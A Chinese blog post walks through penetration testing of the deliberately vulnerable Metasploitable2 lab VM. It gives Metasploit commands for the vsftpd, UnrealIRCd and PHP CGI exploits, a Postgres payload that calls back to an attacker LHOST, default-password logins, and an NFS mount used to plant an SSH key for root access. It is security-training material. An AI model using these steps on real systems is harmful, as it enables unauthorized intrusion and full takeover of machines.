Metasploitable2靶机漏洞渗透测试

已于 2023-03-11 15:59:10 修改
阅读量2k 收藏 23
点赞数 3
文章标签: 学习 安全 网络 Powered by 金山文档
于 2023-03-11 15:52:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xyc_0/article/details/129459130
版权

靶机下载地址:Download Metasploitable - Intentionally Vulnerable Machine | Rapid7

安装方法:下载后直接用vmware打开使用,不需要安装

一、信息收集

扫描靶机开启的服务

nmap -sV 192.168.180.133

这里看到有很多端口和服务,我们一个一个来

二、渗透测试

1、21端口/vsftpd 2.3.4

此版本的vsftpd可能存在笑脸漏洞,我们进行测试

打开msfconsole漏洞测试平台

搜索vsftpd

search vsftpd

使用exploit/unix/ftp/vsftpd_234_backdoor漏洞攻击模块

use 0

查看漏洞需要配置的参数

show options

设置目标IP

set RHOSTS 192.168.180.133

运行

run

成功获取到靶机权限

2、139 | 445 Samba smbd 3.X - 4.X

Samba漏洞影响版本 Samba 3.5.0到4.6.4/4.5.10/4.4.14的中间,条件符合我们进行渗透测试

打开msfconsole漏洞测试平台

搜索samba漏洞攻击模块

search samba

使用此模块

use 8

查看此模块需要配置的参数

show options

设置目标IP

set RHOSTS 192.168.180.133

运行

run

渗透成功,拿到靶机权限

3、22 | 23 | 3306 | 5432 | 5900弱口令

22/ssh 弱口令

我们使用靶机默认的账号密码尝试登录ssh

ssh msfadmin@192.168.180.133

登录成功

23/telnet 弱口令

使用靶机默认的账号密码登录telnet

telnet 192.168.180.133

登录成功

3306/MySQL 弱口令

我们直接远程连接数据库试一下

mysql -h 192.168.180.133

登录成功

5432/postgresql 弱口令

使用默认的账号密码登录测试一下

psql -h 192.168.180.133 -U postgres

登录成功

5900/Vnc 弱口令

密码password连接测试一下

vncviewer 192.168.180.133

登录成功

1099/Java Rmi Server命令执行漏洞

1099开启java-rmi服务可能存在Java Rmi Serve远程命令执行漏洞,我们测试一下

使用msfconsole漏洞测试平台

搜索java_rmi_server漏洞模块

search java_rmi_serve

使用漏洞测试模块测试漏洞是否存在

查看漏洞需要配置的参数

show options

设置目标IP

set RHOSTS 192.168.180.133

运行

run

运行成功,漏洞存在

使用漏洞攻击模块,进行渗透测试

use 0

查看需要配置的参数

show options

设置目标IP

set RHOSTS 192.168.180.133

运行

run

获取权限

session -i

成功获取到靶机权限

2049/nfs

看到开启nfs服务我们可以利用NFS服务将本地主机的ssh公钥传输到目标主机上,再利用ssh连接到目标主机

查看靶机设置的远程目录列表

showmount -e 192.168.180.133

生成ASR公钥

ssh-keygen

将靶机的根目录挂载到/tmp/xxx/下(xxx是我创建的文件夹)

mount -t nfs 192.168.180.133:/ /tmp/xxx

将生成的公钥追加到靶机的authorized_keys下

umount /tmp/xxx

使用ssh远程登录

ssh root@192.168.180.133

成功无密码登录靶机ssh

6667/UnrealIRCd 后门漏洞

发现靶机开启UnrealIRCd服务,尝试渗透

打开msfconsole漏洞测试平台

搜索unreal_ircd 漏洞模块

search unreal_ircd

使用exploit/unix/irc/unreal_ircd_3281_backdoor漏洞攻击模块

use 0

查看需要配置的参数

show options

设置目标IP

set RHOSTS 192.168.180.133

运行

run

发现运行失败,我们配置一下payload

show payloads
set payload cmd/unix/bind_perl

运行

run

渗透成功

1524/Ingreslock后门漏洞

发现靶机开启1524端口,可能会存在后门程序,我们进行渗透测试

telnet 192.168.180.133 1524

登录成功

8180/http Tomcat管理台弱口令漏洞

发现靶机开启http服务,我们访问一下

许多的tomcat管理后台都没有改密码,使用的默认密码,我们点击Tomcat Manager访问一下

默认账号密码:tomcat

成功登录管理后台

PHP CGI 参数注入执行漏洞

打开msfconsole渗透测试平台

搜索php_cgi漏洞攻击模块

search php_cgi

使用exploit/multi/http/php_cgi_arg_injection漏洞攻击模块

use 0

查看需要配置的参数

show options

设置目标IP

set RHOSTS 192.168.180.133

运行

run

成功获取到靶机权限

Postgres共享库代码任意执行

打开msfconsole渗透测试平台

搜索postgres漏洞模块

search postgres

这里我们使用exploit/linux/postgres/postgres_payload模块

use exploit/linux/postgres/postgres_payload

查看需要配置的参数

show options

设置靶机IP

set RHOSTS 192.168.180.133

设置本地IP

set LHOST 192.168.180.128

运行

run

成功拿到靶机shell

Attach_1
关注
Metasploitable2靶机渗透笔记
qq_60600840的博客
07-20 837
metaspolitable靶机安全、渗透、靶机
metasploitable2 渗透测试靶机 1
m0_73910867的博客
10-11 1765
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msfadmin 和密码msfadmin登陆 适用于学习网络安全
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
Metasploitable靶机渗透
qq_51926773的博客
11-01 2997
1.导入命令ifconfig得到自己的本机ip(即攻击机) 2.在kali打开nmap,输入自己的本机ip范围,得到在同一局域网的内存活的主机。 3.找到21端口,图片显示ftp。 4.接下来对靶场机器进行探测,我们使用nmap命令 nmap -sV ip/24,得到目标靶机ip 5.然后使用浏览器来浏览http服务的信息,在网址栏输入目标靶机ip 6.得到网页,网页给出信息,登录靶机的账号密码 7.然后输入telnet ip 登录靶机 8.之后再调出控制栏输入msfconsole,连接靶机.
Kali Linux 2019 学习手册(三)
最新发布
龙哥盟
07-15 1158
在本章中,我们能够涵盖了许多实用内容,例如破解 WEP 和 WPA 无线加密标准以恢复密钥(密码)。在利用无线安全性之后,我们讨论并演示了最佳实践,以便我们可以保护无线网络免受潜在黑客的攻击。此外,还介绍了对微软的 RDP 和 Citrix 服务进行渗透测试的实际方法。最后,我们讨论了各种网络植入物的用途,以及它们如何可以保持对企业网络的远程访问。您现在具备了访问无线网络、对目标系统进行利用以及访问 Linux 和 Windows 操作系统的技能。在第十一章中,网络渗透测试-连接后攻击。
Metasploitable2靶机渗透学习
m0_65712192的博客
05-19 6983
Metasploitable2靶机渗透学习
metasploitable2靶场漏洞总结(部分)
leavrow的博客
08-17 3475
部分metasploitable2渗透靶场漏洞,有很多漏洞都过时了
Metasploitable2靶机渗透
weixin_51167520的博客
03-13 1868
Metasploitable2靶机渗透 实验环境:KALI Metasploitable2 Metasploitable2介绍 Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox,和其他虚拟平台。默认只开启一个网络适配器并且开启NAT和Host-only,本镜像一定不要暴漏在一个易受攻击的网络中。 进行此次靶机
Metasploitable2 靶机漏洞
05-21
Metasploitable2是一款特意设计用于安全培训和漏洞评估的虚拟机,它包含了多个漏洞,可用于测试和学习渗透测试技术。以下是Metasploitable2中包含的一些常见漏洞: 1. Samba漏洞:该漏洞存在于Samba的可共享文件夹...
metasploitable2 渗透测试靶机 2
m0_73910867的博客
10-13 1063
metasploitable2 渗透测试靶机 2
Metasploitable2中FTP漏洞
m0_56368726的博客
11-04 345
1、查看靶机的ip Metasploitable2默认的用户名是 :msfadmin 密码是: msfadmin 登陆之后使用ip addr查看ip地址 靶机的ip为192.168.43.253
Metasploit 内网渗透二—— 实战渗透操作--感受渗透流程,具体做什么 -永恒之蓝漏洞
天下著书立传者,皆为我师
04-24 2171
渗透测试实战练习1——永恒之蓝漏洞(渗透攻击 Win7 主机并远程执行命令)以及mysql空密码扫描利用(获取mysql数据库中信息)
利用msf 对靶机metasploittable2 进行信息收集
枫梓林のBlog
04-20 1393
利用msf 对靶机metasploittable2 进行信息收集 文章目录利用msf 对靶机metasploittable2 进行信息收集测试环境信息统一收集1.使用netdiscover 扫描存活主机2.使用 Nmap 确认该目标主机3.使用zenmap 扫描开放端口 查找漏洞4.如上图这么多端口开放使用 Nessus 扫描该主机的漏洞一、基于 TCP 协议收集主机信息1.1 ARP 扫描1.2 使用半连接方式扫描TCP端口1.3 使用 auxiliary/sniffer 下的psnuffle 模块进行密
对DriftingBlues-4靶机进行渗透测试
zll___的博客
04-20 501
对DriftingBlues-4靶机进行渗透测试
看完这篇 教你玩转渗透测试靶机——Metasploitable2
m0_67401746的博客
03-18 7605
Metasploitable2渗透测试详解 Metasploitable2靶机介绍: Metasploitable2靶机下载Metasploitable2靶机安装: Metasploitable2靶机漏洞详解: Metasploitable2靶机渗透总结: Metasploitable2靶机介绍: Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msf
metasploitable2靶机
雨泽网络工作室
08-16 4941
一、Metasploitable2简介 Metasploitable2虚拟系统是一个特别制作的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最重要的是可以用来作为MSF攻击用的靶机。 开放了很多的高危端口如21、23、445等,而且具有很多未打补丁的高危漏洞, 如Samba MS-RPC Shell命令注入漏洞等,而且对外开放了很多服务,并且数据库允许外联等。系统中的用户口令均为弱口令。系统搭载了DVWA、Mutillidae等Web漏洞演练平台。 使用方法
Metasploitable 2靶机
小小猪的博客
06-19 310
Metasploitable 2靶机 arp-scan -l 扫描靶机IP地址
搭建Metasploitable靶机
yzl_007的博客
08-07 1284
搭建Metasploitable靶机 开始本机下载后来解压直接报毒,上虚拟机操作(windows10) https://github.com/rapid7/metasploitable3 下载好压缩包后通过共享文件传到虚拟机上 下载packer(推荐1.35,报错更换版本) https://releases.hashicorp.com/packer/ 安装好你想要的版本后将exe文件放在想要的地方,然后添加上环境变量 例如虚拟机中是如下位置 在环境变量path里添加上即可 然后cmd packer
基于笑脸漏洞靶机渗透
qq_56472016的博客
11-03 670
一 打开我们的kali虚拟机,并打开我们的被渗透的靶机。 二 我们在虚拟机上登录后用ifconfig指令查看靶机的ip地址 得到的地址为192.168.159.129. 三 在kali上打开一个终端,用su root指令后输入root的登录密码,进入root模式,方便我们运用一些指令。 四 我们使用nmap指令,查看靶机的端口开放情况 我们发现靶机的21端口是打开的,再使用nmap -p 查看靶机的6200端口,发现6200端口是关闭的。 五 这时...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值